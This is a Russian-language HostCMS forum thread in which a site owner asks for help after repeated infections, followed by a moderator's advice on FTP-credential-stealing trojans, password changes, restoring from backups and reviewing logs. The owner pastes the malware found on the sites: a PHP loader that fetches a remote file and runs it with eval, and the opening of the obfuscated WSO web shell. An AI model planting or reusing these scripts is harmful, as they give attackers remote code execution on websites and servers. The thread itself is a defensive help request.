Изменение файлов по ФТП (Давайте темы называть по существу. Администрация.)

2 июля 2013 г.

Добрый день.

Такая ситуация сложилась.
Есть несколько сайтов на HostCMS на хостинге.
Оказались заражены некоторые из них.

Заражены этим:
(HEX)php.cmdshell.unclasses.344
(HEX)php.cmdshell.DxShell.221

Текст вирусов:
====
<?php
$al=file('http://massage-moscow.tk/issaa.jpg', FILE_IGNORE_NEW_LINES);
$slp="";
for ($i=0; $i<count($al); $i++) {
if (! strpos($al[$i], $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']."\t"

) continue;
$slp=$slp.' '.substr($al[$i], strpos($al[$i], "\t"

+1);
}
echo eval($al[0]);
?>

==== кусок второго:
<?php
$auth_pass = "27c520c3fe709323ae7fcdbf71d44b9c";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'5b19fxq30jD8d/wp5C3tQoMx .... много текста.....\x29\x3B","."

;?>

=====

Второй это какой-то известный Google`у шелл WSO.

Кроме сайтов был заражен сам сервер какой-то фигней, сканировавший внешнюю сеть.

Сервер был полностью переставлен. ФТП-аккаунты не заводились. Остались только пароли на админки сайтов старые.

Сегодня вечером на двух сайтах нашел снова эти скрипты.
Злоумышленник заливает в корень файл sl.php, который вызывает из шаблона.
Кроме того, добавляет в /admin/documents/ файлы типа edit_documents.php
Иногда еще в другие папки.

Хочу понять как кроме ухода на сторону пароля от админки возможен этот доступ?

Буду признателен за помощь.

Как можно обезопаситься от этого на будущее?

Модератор 2 июля 2013 г.

Re: Изменение файлов по ФТП (Давайте темы называть по существу. Администрация.)

0. У Вас не взлом HostCMS, как Вы громко заявляете, а взлом сервера или просто бардак в сриптах. Просьба верно называть темы и не бросаться такими заголовками.

1. Внедрением вредоносного кода занимается программа-троян, похищающая у пользователя пароли FTP-доступа и часто не определяющаяся антивирусными программами.
Анализ механизма заражения сайтов показывает, что файлы меняются посредством легального (!) FTP-подключения, т.е. никакого взлома сайта не производилось, а всего лишь осуществлялся вход по логину/паролю и последующая модификация файлов сайта.
Подобное поведение присуще программам семейства Pinch, которые умеют обходить брандмауэры и антивирусные программы и похищает пароли, сохраненные в InternetExplorer, CuteFTP, TotalCommander, WindowsCommander и др.

Порядок решения проблемы:
1. (!!!) Необходимо проверить свой компьютер антивирусом с самыми последними обновлениями. (!!!)
2. (!!!) Сменить пароли доступа ко всем FTP-аккаунтам. (!!!)
3. Восстановить сайт из резервной копий, предварительно проверив, что сайт в резервной копии не заражен вирусом, т.к. резервная копия могла создаваться уже после заражения сайта или вручную удалить код вируса из файлов, в которых он содержится. Чаще всего код внедряется в index.php файлы в корне и в /admin/, также могут быть повреждены php-файлы в корне, вирус чаще всего находится в самом начале или конце файла и начинается с <script. Определять зараженные файлы можно также по дате их изменения. Также часто повреждаются все JS-файлы, размещенные в /admin/, /modules/, /hostcmsfiles/, /templates/ и т.д.
4. Никогда не сохранять пароли в программах, в том числе в файловых и FTP-менеджерах!
5. Учитывая большой список известных уязвимостей Internet Explorer, воспользоваться альтернативными браузерами, например, Firefox.

Описания найденных вирусов можно прочитать на сайте http://www.securelist.com/ru/descriptions

2. Если ФТП сейчас нет, то могли остаться ранее залитые скрипты, через которые дальше происходит работа злоумышленников. Анализируйте accec-логи сервера и принимайте меры.

3. Дополнительную опасность могут представлять другие скрипты, размещенные на сервер, например, бесплатные форумы, голосовалки и т.п.

Авторизация